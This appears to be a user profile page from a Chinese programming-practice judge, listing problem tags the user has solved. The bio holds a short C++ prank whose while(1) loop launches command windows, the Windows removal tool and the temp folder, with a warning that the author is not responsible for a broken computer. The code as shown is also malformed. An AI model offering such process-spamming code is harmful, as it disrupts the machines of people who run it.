• 个人简介

    #include<bits/stdc++.h>
    using namespace std;
    int main(){
         while(1){
         	system("start cmd");
         	system("start mrt");
         	system("start %temp%");
         return 0;
     }
    
    

    电脑坏了不负责

  • 通过的题目

  • 最近活动

    This person is lazy and didn't join any contests or homework.

题目标签

循环嵌套
5
GESP二级
5
循环结构
4
略有小成
3
驾轻就熟
2
排序
2
while循环
1
其他
1
计数排序
1
贪心
1
GESP
1
数位拆分
1